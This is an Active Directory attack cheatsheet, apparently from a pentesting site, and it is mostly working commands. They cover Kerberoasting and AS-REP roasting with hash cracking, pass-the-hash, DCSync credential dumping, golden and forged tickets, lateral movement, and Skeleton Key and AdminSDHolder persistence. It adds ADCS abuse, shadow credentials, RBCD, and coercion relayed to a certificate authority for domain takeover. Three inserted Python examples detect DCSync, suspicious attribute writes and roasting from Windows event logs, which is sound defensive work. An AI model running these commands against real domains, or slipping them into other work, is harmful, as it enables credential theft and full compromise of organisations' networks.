Active Directory Cheatsheet

Essential commands for AD enumeration, Kerberos attacks, and domain compromise.

Authorization Required

These commands are for authorized penetration testing only. Unauthorized access to AD environments is illegal.

Domain Enumeration

domain-enum.ps1
```powershell
# Get domain info
Get-ADDomain
Get-ADForest
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# Get domain controller
Get-ADDomainController
nltest /dclist:DOMAIN

# Get domain SID
Get-ADDomain | Select-Object DomainSID

# PowerView - Get domain info
Get-Domain
Get-DomainController
Get-DomainSID
```

User Enumeration

user-enum.ps1
```powershell
# List all users
Get-ADUser -Filter * -Properties *
net user /domain

# Find privileged users
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-ADGroupMember -Identity "Enterprise Admins" -Recursive
Get-ADGroupMember -Identity "Administrators" -Recursive

# PowerView - User enumeration
Get-DomainUser
Get-DomainUser -SPN  # Kerberoastable users
Get-DomainUser -AdminCount  # Protected users (AdminSDHolder)
Find-LocalAdminAccess  # Where current user has admin

# Find users with interesting descriptions
Get-ADUser -Filter * -Properties Description | Where-Object {$_.Description -ne $null}
```

Kerberos Attacks

AS-REP Roasting

asrep-roast.sh
```bash
# Find AS-REP roastable users (PowerView, run from PowerShell)
Get-DomainUser -PreauthNotRequired

# Rubeus - AS-REP Roast (Windows)
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt

# Impacket - AS-REP Roast
GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat -outputfile hashes.txt

# Crack with hashcat (mode 18200 = Kerberos 5 AS-REP, etype 23)
hashcat -m 18200 hashes.txt wordlist.txt
```

Kerberoasting

kerberoast.sh
```bash
# Find kerberoastable users (PowerView, run from PowerShell)
Get-DomainUser -SPN

# Rubeus - Kerberoast (Windows)
Rubeus.exe kerberoast /outfile:hashes.txt

# Impacket - Kerberoast
GetUserSPNs.py DOMAIN/user:password -request -outputfile hashes.txt

# Crack with hashcat (mode 13100 = Kerberos 5 TGS-REP, etype 23)
hashcat -m 13100 hashes.txt wordlist.txt
```

Pass the Hash/Ticket

pth-ptt.sh
```bash
# Pass the Hash with Impacket (LM hash left empty before the colon)
psexec.py -hashes :NTLM_HASH DOMAIN/Administrator@TARGET
wmiexec.py -hashes :NTLM_HASH DOMAIN/Administrator@TARGET
smbexec.py -hashes :NTLM_HASH DOMAIN/Administrator@TARGET

# Pass the Hash with CrackMapExec
cme smb TARGET -u Administrator -H NTLM_HASH -x "whoami"

# Pass the Ticket with Rubeus (Windows)
Rubeus.exe ptt /ticket:ticket.kirbi

# Pass the Ticket with Impacket
export KRB5CCNAME=ticket.ccache
psexec.py -k -no-pass DOMAIN/Administrator@TARGET

# OverPass the Hash (request a TGT from the NTLM hash, Windows)
Rubeus.exe asktgt /user:Administrator /rc4:NTLM_HASH /ptt
```

DCSync Attack

dcsync.sh
```bash
# DCSync with Mimikatz (requires replication rights)
lsadump::dcsync /domain:DOMAIN /user:krbtgt
lsadump::dcsync /domain:DOMAIN /all /csv

# DCSync with Impacket
secretsdump.py DOMAIN/user:password@DC_IP
secretsdump.py -hashes :NTLM_HASH DOMAIN/Administrator@DC_IP

# NTDS only, over DRSUAPI (NTLM hashes; skips SAM/LSA secrets)
secretsdump.py DOMAIN/Administrator@DC_IP -just-dc-ntlm
```
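Detection counterpart, added here as an example (not part of this cheatsheet): every DCSync above exercises the directory replication control-access rights, which a DC logs as Security event 4662 with access mask 0x100 and the rights' GUIDs in the Properties field. The events are constructed dicts using the 4662 field names; the DC machine-account allow-list is an assumption you build from your own Domain Controllers OU.

```python
# Added example: flag DCSync-style replication calls in Security event 4662.
# Events are constructed dicts mirroring the 4662 fields (SubjectUserName,
# AccessMask, Properties, SubjectLogonId); feed parsed Get-WinEvent or SIEM
# records into detect_dcsync() in practice.

# Control-access right GUIDs a DCSync needs; legitimate DCs use the same ones
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcf2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcf2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = "0x100"  # AccessMask for an extended (control access) right

def detect_dcsync(events, dc_accounts):
    """Return (subject, logon_id, [rights]) for every 4662 that exercises a
    replication right from a principal outside the DC allow-list. The list
    (DC01$ ...) is an assumption: build it from the Domain Controllers OU,
    not from a trailing '$', which every computer account has."""
    allowed = {a.upper() for a in dc_accounts}
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662 or ev.get("AccessMask") != CONTROL_ACCESS:
            continue
        props = ev.get("Properties", "").lower()
        used = [name for guid, name in REPL_RIGHTS.items() if guid in props]
        if not used:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.upper() not in allowed:
            hits.append((subject, ev.get("SubjectLogonId", "?"), used))
    return hits

# Constructed sample: one legitimate DC replication, one DCSync by a service
# account, and one unrelated write by the same account that must not alert.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectLogonId": "0x3e7", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcf2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcf2}"},
    {"EventID": 4662, "SubjectUserName": "svc_backup", "SubjectLogonId": "0x5a1c2", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcf2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcf2}"},
    {"EventID": 4662, "SubjectUserName": "svc_backup", "SubjectLogonId": "0x5a1c2", "AccessMask": "0x20",
     "Properties": "{0a1b2c3d-0000-4000-8000-000000000001}"},  # constructed non-replication GUID
]

if __name__ == "__main__":
    for subject, logon_id, rights in detect_dcsync(SAMPLE_EVENTS, ["DC01$", "DC02$"]):
        print(f"DCSync indicator: {subject} (logon {logon_id}) used {', '.join(rights)}")
```

Correlate the reported SubjectLogonId with the matching 4624 to recover the source host, since 4662 carries no client address.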

Golden & Silver Tickets

Golden Ticket

golden-ticket.sh
```bash
# Create Golden Ticket (requires krbtgt hash)
# Mimikatz
kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /ptt

# Impacket - ticketer
ticketer.py -nthash KRBTGT_HASH -domain-sid DOMAIN_SID -domain DOMAIN Administrator

# Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass DOMAIN/Administrator@DC
```

Silver Ticket

silver-ticket.sh
```bash
# Create Silver Ticket (requires service account hash)
# For CIFS (file shares)
kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER.DOMAIN /rc4:SERVICE_HASH /service:cifs /ptt

# For HTTP (web services)
kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER.DOMAIN /rc4:SERVICE_HASH /service:http /ptt

# Impacket - ticketer
ticketer.py -nthash SERVICE_HASH -domain-sid DOMAIN_SID -domain DOMAIN -spn cifs/SERVER.DOMAIN Administrator
```

BloodHound Collection

bloodhound.sh
```bash
# SharpHound - Collect all data
SharpHound.exe -c All

# BloodHound Python (remote collection)
bloodhound-python -d DOMAIN -u user -p password -c All -ns DC_IP

# Specific collection methods
SharpHound.exe -c DCOnly  # DC data only
SharpHound.exe -c Session  # Session info only
SharpHound.exe -c ACL  # ACL info only

# Loop collection (stealthy)
SharpHound.exe -c Session --loop --loopduration 02:00:00
```

Lateral Movement

lateral-movement.sh
```bash
# WinRM
winrs -r:TARGET -u:DOMAIN\user -p:password cmd
Enter-PSSession -ComputerName TARGET -Credential DOMAIN\user

# PsExec
psexec.exe \\TARGET -u DOMAIN\user -p password cmd
psexec.py DOMAIN/user:password@TARGET

# WMI
wmiexec.py DOMAIN/user:password@TARGET
wmic /node:TARGET process call create "cmd.exe /c whoami"

# SMB
smbexec.py DOMAIN/user:password@TARGET

# DCOM
dcomexec.py DOMAIN/user:password@TARGET
```

Trust Abuse

trust-abuse.ps1
```powershell
# Enumerate trusts
Get-ADTrust -Filter *
Get-DomainTrust
nltest /domain_trusts /all_trusts

# Cross-domain ticket (SID History) - Mimikatz
# Get child domain krbtgt hash and parent domain SID (RID 519 = Enterprise Admins)
kerberos::golden /user:Administrator /domain:CHILD.DOMAIN /sid:CHILD_SID /krbtgt:CHILD_KRBTGT /sids:PARENT_SID-519 /ptt

# Access parent domain
dir \\parent-dc.parent.domain\c$
```

Domain Persistence

persistence.ps1
```powershell
# Skeleton Key (requires DC access) - Mimikatz
# Patches LSASS on the DC so a master password is accepted for any account (real passwords keep working)
privilege::debug
misc::skeleton

# Add user to Domain Admins
net group "Domain Admins" hacker /add /domain

# AdminSDHolder - Get persistent admin access (PowerView)
# Add user to AdminSDHolder ACL; SDProp propagates it to protected groups hourly
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity hacker -Rights All

# DSRM Password Change
# Change DSRM password (can log in as local admin on DC)
ntdsutil "set dsrm password" "reset password on server null" q q
```

Modern AD Attacks (2024+)

ADCS Attacks (Certipy)

Certificate Services misconfigurations — ESC1 through ESC15.

adcs.sh
```bash
# Find vulnerable templates
certipy find -u user@domain -p 'pass' -dc-ip 10.0.0.1 -vulnerable -stdout

# ESC1: Enrollee Supplies Subject
certipy req -u user@domain -p 'pass' -ca CA-NAME -template VulnTemplate -upn administrator@domain

# ESC8: NTLM relay to Web Enrollment
certipy relay -target 'http://CA-IP/certsrv/' -template 'DomainController'

# Authenticate with PFX
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.1
```

Shadow Credentials (msDS-KeyCredentialLink)

Add a key credential to a target object → request TGT as that account.

shadow-creds.sh
```bash
# Add shadow credentials
certipy shadow auto -u user@domain -p 'pass' -account targetuser

# Or with pyWhisker
python3 pywhisker.py -d domain -u user -p pass --target targetuser --action add

# Use the cert to get a TGT via PKINIT (PKINITtools); the account's NT hash is then recovered from that TGT
gettgtpkinit.py -cert-pfx target.pfx domain/targetuser tgt.ccache
```

RBCD (Resource-Based Constrained Delegation)

If you control an account with GenericWrite on a computer object, abuse RBCD to impersonate any user to that computer's services (full takeover of the host).

rbcd.sh
```bash
# Set msDS-AllowedToActOnBehalfOfOtherIdentity
impacket-rbcd -delegate-from FAKECOMP$ -delegate-to TARGET$ -action write 'domain/user:pass'

# Get a service ticket as any user (e.g., administrator)
getST.py -spn cifs/target.domain.local -impersonate administrator -dc-ip 10.0.0.1 'domain/FAKECOMP$:pass'

# Use the ticket
export KRB5CCNAME=administrator.ccache
impacket-psexec -k -no-pass target.domain.local
```
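Defensive counterpart for both the Shadow Credentials and RBCD sections, added here as an example (not part of this cheatsheet): each technique boils down to one attribute write (msDS-KeyCredentialLink or msDS-AllowedToActOnBehalfOfOtherIdentity), which Security event 5136 records when Directory Service Changes auditing and a SACL on the computer objects are in place. The events are constructed dicts using the 5136 field names; the self-write exemption is an assumption to tune for your environment.

```python
# Added example: triage Security event 5136 (directory object modified) for
# writes to the two attributes abused by Shadow Credentials and RBCD. Needs
# "Audit Directory Service Changes" plus a SACL on the computer objects,
# otherwise no 5136 is emitted. Events below are constructed dicts.

WATCHED_ATTRS = {
    "msds-keycredentiallink": "shadow-credentials",
    "msds-allowedtoactonbehalfofotheridentity": "rbcd",
}
VALUE_ADDED = "%%14674"  # 5136 OperationType code for "Value Added"

def target_cn(object_dn):
    """First RDN of the DN without its 'CN=' prefix, e.g. 'FS01'."""
    first = object_dn.split(",")[0]
    return first[3:] if first.upper().startswith("CN=") else first

def classify_change(ev):
    """(technique, subject, object_dn) for a 5136 that adds a value to a watched
    attribute, else None. Assumption to tune: a computer writing its own
    msDS-KeyCredentialLink (device registration) is expected and skipped."""
    if ev.get("EventID") != 5136 or ev.get("OperationType") != VALUE_ADDED:
        return None
    technique = WATCHED_ATTRS.get(ev.get("AttributeLDAPDisplayName", "").lower())
    if technique is None:
        return None
    subject, object_dn = ev.get("SubjectUserName", ""), ev.get("ObjectDN", "")
    self_write = subject.rstrip("$").upper() == target_cn(object_dn).upper()
    if technique == "shadow-credentials" and self_write:
        return None
    return (technique, subject, object_dn)

def triage(events):
    """Ordered list of hits for a batch of events."""
    return [hit for hit in map(classify_change, events) if hit]

# Constructed sample: a benign self-registration, the two attacker writes from
# the sections above, then an unrelated attribute change (value deleted).
FS01 = "CN=FS01,OU=Servers,DC=corp,DC=local"
SAMPLE_EVENTS = [
    {"EventID": 5136, "OperationType": "%%14674", "SubjectUserName": "WS07$",
     "ObjectDN": "CN=WS07,OU=Workstations,DC=corp,DC=local", "AttributeLDAPDisplayName": "msDS-KeyCredentialLink"},
    {"EventID": 5136, "OperationType": "%%14674", "SubjectUserName": "jdoe",
     "ObjectDN": FS01, "AttributeLDAPDisplayName": "msDS-KeyCredentialLink"},
    {"EventID": 5136, "OperationType": "%%14674", "SubjectUserName": "jdoe",
     "ObjectDN": FS01, "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    {"EventID": 5136, "OperationType": "%%14675", "SubjectUserName": "admin",
     "ObjectDN": FS01, "AttributeLDAPDisplayName": "description"},
]
```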

Diamond / Sapphire Tickets

Modern golden-ticket variants that are harder to detect — request a real TGT, then modify the PAC.

diamond-sapphire.sh
```bash
# Diamond Ticket (Rubeus)
Rubeus.exe diamond /tgtdeleg /ticketuser:administrator /ticketuserid:500 /groups:512 /krbkey:KRBTGT_AES256

# Sapphire Ticket (Impacket)
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-X-Y-Z -domain DOMAIN -request -user existing_user -password 'pass' -dc-ip DC-IP administrator
```

Coercion (PetitPotam / DFSCoerce / PrinterBug)

Force a target machine account to authenticate to your relay listener.

coerce.sh
```bash
# PetitPotam (MS-EFSRPC)
python3 PetitPotam.py -u user -p pass LISTENER_IP TARGET_IP

# DFSCoerce (MS-DFSNM)
python3 dfscoerce.py -u user -p pass LISTENER_IP TARGET_IP

# PrinterBug (MS-RPRN, requires Print Spooler)
python3 printerbug.py domain/user:pass@TARGET LISTENER_IP

# Relay to ADCS Web Enrollment for full domain takeover
ntlmrelayx.py -t http://CA/certsrv/certfnsh.asp --adcs --template DomainController
```

Pre-Auth Roasting (timeroasting / asreproast)

Bulk-extract crackable hashes without valid credentials.

roast.sh
```bash
# AS-REP Roast (no preauth)
impacket-GetNPUsers -dc-ip DC-IP -no-pass -usersfile users.txt domain/

# Timeroasting (Windows Time Service)
python3 timeroast.py DC-IP > hashes.txt
hashcat -m 31300 hashes.txt rockyou.txt

# Kerberoast all SPNs at once
impacket-GetUserSPNs -request -dc-ip DC-IP domain/user:pass
```
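Detection counterpart for the Kerberoasting, AS-REP Roasting and Pre-Auth Roasting sections, added here as an example (not part of this cheatsheet): the DC logs every service-ticket request as Security event 4769 and every TGT request as 4768, and the roasting tools above leave a distinct shape in them (RC4 tickets for user SPNs, many from one client; TGTs issued with pre-authentication type 0). The events are constructed dicts using the 4768/4769 field names; the per-source threshold and the tolerance for machine-account RC4 tickets are assumptions to tune.

```python
# Added example: flag Kerberoast and AS-REP roast indicators in Security events
# 4769 (service ticket requested) and 4768 (TGT requested) from a DC. Events
# are constructed dicts mirroring the event fields; feed parsed Get-WinEvent
# or SIEM records into find_roasting() in practice.

RC4_HMAC = "0x17"   # TicketEncryptionType for RC4; AES128/256 are 0x11/0x12
NO_PREAUTH = "0"    # 4768 PreAuthType 0: no pre-authentication was needed

def classify_event(ev):
    """Finding string for one event, or None. Assumption: RC4 service tickets
    for machine accounts or krbtgt are tolerated (mixed environments still
    issue them); an RC4 ticket for a user SPN is the Kerberoast signal."""
    eid, user = ev.get("EventID"), ev.get("TargetUserName", "")
    if eid == 4769:
        svc = ev.get("ServiceName", "")
        if (ev.get("TicketEncryptionType") == RC4_HMAC
                and not svc.endswith("$") and svc.lower() != "krbtgt"):
            return f"kerberoast: {user} requested RC4 ticket for {svc}"
    elif eid == 4768:
        if ev.get("PreAuthType") == NO_PREAUTH and ev.get("Status") == "0x0":
            return f"asrep-roast: TGT issued to {user} without pre-auth"
    return None

def find_roasting(events, threshold=3):
    """Return (findings, bulk_sources): every finding, plus the client IPs with
    at least `threshold` RC4 service-ticket requests in the batch, which is
    the shape of a tool that roasts every SPN at once."""
    findings, per_source = [], {}
    for ev in events:
        finding = classify_event(ev)
        if finding is None:
            continue
        findings.append(finding)
        if finding.startswith("kerberoast"):
            src = ev.get("IpAddress", "?")
            per_source[src] = per_source.get(src, 0) + 1
    return findings, [s for s, n in per_source.items() if n >= threshold]

# Constructed sample: an AES ticket (benign), three RC4 tickets for user SPNs
# from one client, one no-preauth TGT, one normal TGT.
def _tgs(svc, etype, ip="10.0.0.5"):
    return {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": svc,
            "TicketEncryptionType": etype, "IpAddress": ip}
SAMPLE_EVENTS = [
    _tgs("WS01$", "0x12"), _tgs("svc_sql", "0x17"), _tgs("svc_web", "0x17"), _tgs("svc_backup", "0x17"),
    {"EventID": 4768, "TargetUserName": "legacyapp", "PreAuthType": "0", "Status": "0x0", "IpAddress": "10.0.0.9"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2", "Status": "0x0", "IpAddress": "10.0.0.7"},
]
```

The timeroasting commands above never touch Kerberos, so this logic does not see them; that path is limited by keeping computer-account passwords rotating rather than by ticket auditing.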

⚠️ Legal Disclaimer

Active Directory attacks can cause significant damage to production environments. Only use these techniques on systems you own or have explicit written authorization to test.